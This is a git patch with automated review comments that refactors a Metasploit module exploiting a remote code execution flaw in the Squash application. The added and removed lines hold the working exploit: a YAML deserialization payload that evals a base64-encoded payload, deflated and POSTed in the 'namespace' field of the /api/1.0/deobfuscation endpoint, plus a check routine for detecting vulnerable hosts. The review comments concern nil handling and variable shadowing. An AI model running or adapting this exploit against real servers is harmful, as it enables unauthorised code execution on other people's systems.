From 1c6e994fe85f0c5065e2c7e82029233f1ab9b29d Mon Sep 17 00:00:00 2001
From: Charlie Eriksen
Date: Thu, 8 Aug 2013 14:29:35 -0400
Subject: [PATCH] Adding improvements based on Juan's feedback
---
 .../exploits/unix/webapp/squash_yaml_exec.rb | 19 ++++++++++---------
 1 file changed, 10 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/unix/webapp/squash_yaml_exec.rb b/modules/exploits/unix/webapp/squash_yaml_exec.rb
index ff1e0255ed..becd53c36a 100644
--- a/modules/exploits/unix/webapp/squash_yaml_exec.rb
+++ b/modules/exploits/unix/webapp/squash_yaml_exec.rb
@@ -7,7 +7,6 @@
 require 'msf/core'
 require 'zlib'
-require 'base64'
 class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking
@@ -16,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'Squash YAML Code Exec',
+ 'Name' => 'Squash YAML Code Execution',
 'Description' => %q{
 This module exploits a remote code execution vulnerability in the YAML request processor of the Squash application.
@@ -49,10 +48,11 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 response = send_request_cgi({
- 'uri' => "#{datastore['TARGETURI']}api/1.0/deobfuscation",
+ 'uri' => normalize_uri(target_uri.path, '/api/1.0/deobfuscation'),
 'method' => 'POST',
 'ctype' => 'application/json',
- }, 30)
+ })
+
 if response.code == 422
 print_status("Got HTTP 422 result, target may be vulnerable")
 return Exploit::CheckCode::Appears
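Review bot: `if response.code == 422` in `check` dereferences the response with no nil guard; `send_request_cgi` returns nil when the connection fails or times out (not visible in this hunk, but the HttpClient mixin's usual behaviour), so a dead or filtered host would raise NoMethodError instead of yielding a check result. Add `return Exploit::CheckCode::Unknown unless response` between the new blank line and the comparison, or write the condition as `if response && response.code == 422`. The conditional and the rest of `check` continue past the end of the hunk. The first two hunks (dropping `require 'base64'` and the module name change) raise nothing.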
@@ -63,15 +63,16 @@ class Metasploit3 < Msf::Exploit::Remote
 def exploit
 code = Rex::Text.encode_base64(payload.encoded)
 yaml = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
- "'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
- ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
- payload = Base64.encode64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
+ "'#{rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
+ ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
+ payload = Rex::Text.encode_base64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")
 data = "{\"api_key\":\"1\",\"environment\":\"production\",\"build\":\"1\",\"namespace\":\"#{payload}\"}"
+
 send_request_cgi({
- 'uri' => "#{datastore['TARGETURI']}api/1.0/deobfuscation",
+ 'uri' => normalize_uri(target_uri.path, '/api/1.0/deobfuscation'),
 'method' => 'POST',
 'ctype' => 'application/json',
 'data' => data
- }, 30)
+ })
 end
 end
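Review bot: The new `payload = Rex::Text.encode_base64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")` line reuses the name of the module's `payload` accessor that `payload.encoded` calls two lines earlier, so inside `exploit` the same identifier is a method call before the assignment and a local String after it. Rename the local to what it actually holds, e.g. `namespace = Rex::Text.encode_base64(Zlib::Deflate.deflate(yaml)).gsub("\n", "")` and `\"namespace\":\"#{namespace}\"}"` in the `data` literal, so a reader does not have to reason about Ruby's parse-order rule to know which one is meant. The shadowing existed before this patch as well, so this is a pre-existing style point rather than a regression introduced here.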